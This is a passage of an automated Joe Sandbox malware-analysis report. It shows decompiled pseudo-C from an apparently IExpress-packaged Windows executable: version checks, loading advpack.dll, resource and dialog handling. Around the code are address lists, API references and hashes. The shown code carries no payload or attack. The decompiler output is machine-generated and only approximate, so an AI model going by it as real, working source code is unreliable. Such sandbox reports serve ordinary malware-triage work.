                                                                                                                                                                                                          					return E00866CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





































                                                                                                                                                                                                          0x008637ab
                                                                                                                                                                                                          0x008637ad
                                                                                                                                                                                                          0x008637ae
                                                                                                                                                                                                          0x008637b3
                                                                                                                                                                                                          0x008637b8
                                                                                                                                                                                                          0x008637b8
                                                                                                                                                                                                          0x008637bf
                                                                                                                                                                                                          0x008637bf
                                                                                                                                                                                                          0x008637c5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008637cb
                                                                                                                                                                                                          0x008637cd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008637d5
                                                                                                                                                                                                          0x008637db
                                                                                                                                                                                                          0x008637e8
                                                                                                                                                                                                          0x008637ea
                                                                                                                                                                                                          0x008637ea
                                                                                                                                                                                                          0x008637ea
                                                                                                                                                                                                          0x008637f0
                                                                                                                                                                                                          0x008637f6
                                                                                                                                                                                                          0x00863805
                                                                                                                                                                                                          0x00863817
                                                                                                                                                                                                          0x0086382b
                                                                                                                                                                                                          0x00863830
                                                                                                                                                                                                          0x00863836
                                                                                                                                                                                                          0x0086383b
                                                                                                                                                                                                          0x0086383d
                                                                                                                                                                                                          0x008638eb
                                                                                                                                                                                                          0x008638eb
                                                                                                                                                                                                          0x008638f2
                                                                                                                                                                                                          0x0086390c
                                                                                                                                                                                                          0x00863911
                                                                                                                                                                                                          0x00863911
                                                                                                                                                                                                          0x00863913
                                                                                                                                                                                                          0x0086394d
                                                                                                                                                                                                          0x0086394d
                                                                                                                                                                                                          0x0086394f
                                                                                                                                                                                                          0x008638a9
                                                                                                                                                                                                          0x008638a9
                                                                                                                                                                                                          0x008638b0
                                                                                                                                                                                                          0x008638b2
                                                                                                                                                                                                          0x008638b9
                                                                                                                                                                                                          0x008638bb
                                                                                                                                                                                                          0x008638c1
                                                                                                                                                                                                          0x00863975
                                                                                                                                                                                                          0x008638c7
                                                                                                                                                                                                          0x008638de
                                                                                                                                                                                                          0x008638e0
                                                                                                                                                                                                          0x008638e0
                                                                                                                                                                                                          0x0086397b
                                                                                                                                                                                                          0x0086397d
                                                                                                                                                                                                          0x008639a9
                                                                                                                                                                                                          0x0086397f
                                                                                                                                                                                                          0x00863982
                                                                                                                                                                                                          0x0086398b
                                                                                                                                                                                                          0x0086398d
                                                                                                                                                                                                          0x0086398f
                                                                                                                                                                                                          0x0086399f
                                                                                                                                                                                                          0x008639a1
                                                                                                                                                                                                          0x00863991
                                                                                                                                                                                                          0x00863991
                                                                                                                                                                                                          0x00863991
                                                                                                                                                                                                          0x0086398f
                                                                                                                                                                                                          0x008639af
                                                                                                                                                                                                          0x008639b6
                                                                                                                                                                                                          0x00863a0f
                                                                                                                                                                                                          0x00863a0f
                                                                                                                                                                                                          0x00863a11
                                                                                                                                                                                                          0x00863a13
                                                                                                                                                                                                          0x00863a19
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639b8
                                                                                                                                                                                                          0x008639b8
                                                                                                                                                                                                          0x008639ba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639bc
                                                                                                                                                                                                          0x008639bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639c3
                                                                                                                                                                                                          0x008639c9
                                                                                                                                                                                                          0x008639ce
                                                                                                                                                                                                          0x008639d0
                                                                                                                                                                                                          0x008639e3
                                                                                                                                                                                                          0x008639e5
                                                                                                                                                                                                          0x008639e6
                                                                                                                                                                                                          0x008639f1
                                                                                                                                                                                                          0x008639f7
                                                                                                                                                                                                          0x008639fa
                                                                                                                                                                                                          0x00863a01
                                                                                                                                                                                                          0x00863a04
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863a06
                                                                                                                                                                                                          0x00863a09
                                                                                                                                                                                                          0x00863a09
                                                                                                                                                                                                          0x00863a0b
                                                                                                                                                                                                          0x00863a0b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863a09
                                                                                                                                                                                                          0x008639fc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639fc
                                                                                                                                                                                                          0x008639d3
                                                                                                                                                                                                          0x008639d8
                                                                                                                                                                                                          0x008639da
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008639dc
                                                                                                                                                                                                          0x008639b6
                                                                                                                                                                                                          0x00863955
                                                                                                                                                                                                          0x0086395b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863961
                                                                                                                                                                                                          0x00863963
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863969
                                                                                                                                                                                                          0x00863969
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863969
                                                                                                                                                                                                          0x00863915
                                                                                                                                                                                                          0x00863915
                                                                                                                                                                                                          0x0086391b
                                                                                                                                                                                                          0x0086391f

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00863723
                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 008639C3
                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,herso,00000030), ref: 008639F1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$BeepVersion
                                                                                                                                                                                                          • String ID: 3$herso
                                                                                                                                                                                                          • API String ID: 2519184315-3003840238
                                                                                                                                                                                                          • Opcode ID: 81f15a74ee3d0f1e08226f578bb0b13c6d6bf98476e4c16d5eb67f5bc66fcf7a
                                                                                                                                                                                                          • Instruction ID: a23a60edc0ff8618498053c39a872aee016fc8e21b52c8caa1e3080793482993
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81f15a74ee3d0f1e08226f578bb0b13c6d6bf98476e4c16d5eb67f5bc66fcf7a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0891E4B1A012289BDB358F54CD81BEA77B5FB46305F1701A9D88AEB291DB708F80DF41
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                          			E00866495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				signed char _t14;
                                                                                                                                                                                                          				struct HINSTANCE__* _t15;
                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                          				CHAR* _t26;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                          				_t18 = __ebx;
                                                                                                                                                                                                          				_t9 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				E00861781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          				_t26 = "advpack.dll";
                                                                                                                                                                                                          				E0086658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                          				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                          				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                          					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                          			}














                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008664DF
                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008664F9
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00866502
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                          • API String ID: 438848745-258089097
                                                                                                                                                                                                          • Opcode ID: f3cc4ed23d8f082296f1dd5e000f4f42fd901d50815d75d335ad8f97cfcda1c7
                                                                                                                                                                                                          • Instruction ID: 935ccaf4d8dcd6eca00e25961a7393b4d4d61a8dfad586d08c1f3f194e50ab5e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3cc4ed23d8f082296f1dd5e000f4f42fd901d50815d75d335ad8f97cfcda1c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01D630904108EBDB54DB64DC4AAEA7378FB61314F520195F596E21C0EFB09E998B52
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                          				long _t68;
                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                          				intOrPtr _t93;
                                                                                                                                                                                                          				intOrPtr _t97;
                                                                                                                                                                                                          				intOrPtr _t99;
                                                                                                                                                                                                          				int _t101;
                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                                          				_t99 = __ecx;
                                                                                                                                                                                                          				_t106 = 0;
                                                                                                                                                                                                          				_v16 = __ecx;
                                                                                                                                                                                                          				_t87 = 0;
                                                                                                                                                                                                          				_t103 = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                          					_t106 = 1;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t62 = 0;
                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                          						if(E00862773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                          						_v28 = _t68;
                                                                                                                                                                                                          						if(_t68 == 0) {
                                                                                                                                                                                                          							_t99 = _v16;
                                                                                                                                                                                                          							_t70 = _v8 + _t99;
                                                                                                                                                                                                          							_t93 = _v24;
                                                                                                                                                                                                          							_t87 = _v20;
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                          							if(_t103 != 0) {
                                                                                                                                                                                                          								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                          								_v36 = _t73;
                                                                                                                                                                                                          								if(_t73 != 0) {
                                                                                                                                                                                                          									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                          										L15:
                                                                                                                                                                                                          										GlobalUnlock(_t103);
                                                                                                                                                                                                          										_t99 = _v16;
                                                                                                                                                                                                          										L18:
                                                                                                                                                                                                          										_t87 = _t87 + 1;
                                                                                                                                                                                                          										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                          										_v20 = _t87;
                                                                                                                                                                                                          										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                          										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L19;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t79 = _v44;
                                                                                                                                                                                                          										_t88 = _t106;
                                                                                                                                                                                                          										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                          										_t101 = _v28;
                                                                                                                                                                                                          										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                          										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                          										_t97 = _v48;
                                                                                                                                                                                                          										_v36 = _t83;
                                                                                                                                                                                                          										_t109 = _t83;
                                                                                                                                                                                                          										do {
                                                                                                                                                                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00862A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00862A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                          											_t109 = _t109 + 0x18;
                                                                                                                                                                                                          											_t88 = _t88 + 4;
                                                                                                                                                                                                          										} while (_t88 < 8);
                                                                                                                                                                                                          										_t87 = _v20;
                                                                                                                                                                                                          										_t106 = 0;
                                                                                                                                                                                                          										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                          											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                          												GlobalUnlock(_t103);
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L15;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L15;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L20:
                                                                                                                                                                                                          				 *_a8 = _t87;
                                                                                                                                                                                                          				if(_t103 != 0) {
                                                                                                                                                                                                          					GlobalFree(_t103);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t106;
                                                                                                                                                                                                          			}


                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00862A6F
                                                                                                                                                                                                            • Part of subcall function 00862773: CharUpperA.USER32(B82E2007,00000000,00000000,00000000), ref: 008627A8
                                                                                                                                                                                                            • Part of subcall function 00862773: CharNextA.USER32(0000054D), ref: 008627B5
                                                                                                                                                                                                            • Part of subcall function 00862773: CharNextA.USER32(00000000), ref: 008627BC
                                                                                                                                                                                                            • Part of subcall function 00862773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862829
                                                                                                                                                                                                            • Part of subcall function 00862773: RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862852
                                                                                                                                                                                                            • Part of subcall function 00862773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862870
                                                                                                                                                                                                            • Part of subcall function 00862773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008628A0
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00863938,?,?,?,?,-00000005), ref: 00862958
                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 00862969
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00863938,?,?,?,?,-00000005,?), ref: 00862A21
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00862A81
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3949799724-0
                                                                                                                                                                                                          • Opcode ID: d4b6a75adb4ff191e84bcfeb7ca4ce8e2ef37bccff4566c9ca16ba3d2a4e0393
                                                                                                                                                                                                          • Instruction ID: 561e4a5f360b91df48620189850bf76ec6de468768ba776a989ff01979625f9f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b6a75adb4ff191e84bcfeb7ca4ce8e2ef37bccff4566c9ca16ba3d2a4e0393
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80514831A00629DBCB25CF98D885AAEBBB5FF48701F1640AAE911E3211DB719941CF91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 32%
                                                                                                                                                                                                          			E00864169(void* __eflags) {
                                                                                                                                                                                                          				int _t18;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t20 = E0086468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                          				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                          					if(E0086468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                          						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							return LocalFree(_t21);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						_push(0x40);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						_push(_t21);
                                                                                                                                                                                                          						_t18 = 0x3e9;
                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                          						E008644B9(0, _t18);
                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0x10);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_t18 = 0x4b1;
                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          			}






                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,008630B4), ref: 00864189
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,008630B4), ref: 008641E7
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$FINISHMSG
                                                                                                                                                                                                          • API String ID: 3507850446-3091758298
                                                                                                                                                                                                          • Opcode ID: 74386932c16db0b2944518b01452ac506d8846258c8b8520890f5cc48585003c
                                                                                                                                                                                                          • Instruction ID: 5135d83d2930338b5213aa48064d0e188287699a6fc22f6da0d922c6b395393d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74386932c16db0b2944518b01452ac506d8846258c8b8520890f5cc48585003c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1401D6B13002147FF72416695C86F7F218EFBD6795F075025B706E12819DA9CC01417A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E008619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v520;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          				struct HWND__* _t34;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 = __edi;
                                                                                                                                                                                                          				_t27 = __ebx;
                                                                                                                                                                                                          				_t11 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                          				_t34 = _a4;
                                                                                                                                                                                                          				_t14 = _a8 - 0x110;
                                                                                                                                                                                                          				if(_t14 == 0) {
                                                                                                                                                                                                          					_t32 = GetDesktopWindow();
                                                                                                                                                                                                          					E008643D0(_t34, _t15);
                                                                                                                                                                                                          					_v520 = 0;
                                                                                                                                                                                                          					LoadStringA( *0x869a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                          					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                          					MessageBeep(0xffffffff);
                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if(_t14 != 1) {
                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t32 = _a12;
                                                                                                                                                                                                          						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							EndDialog(_t34, _t32);
                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                          							_t23 = 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                          			}














                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00861A18
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00861A24
                                                                                                                                                                                                          • LoadStringA.USER32(?,?,00000200), ref: 00861A4F
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00861A62
                                                                                                                                                                                                          • MessageBeep.USER32(000000FF), ref: 00861A6A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1273765764-0
                                                                                                                                                                                                          • Opcode ID: 408b713907885a9c79332d3ab5b27c46d981cedbd7859f336313169061eab56a
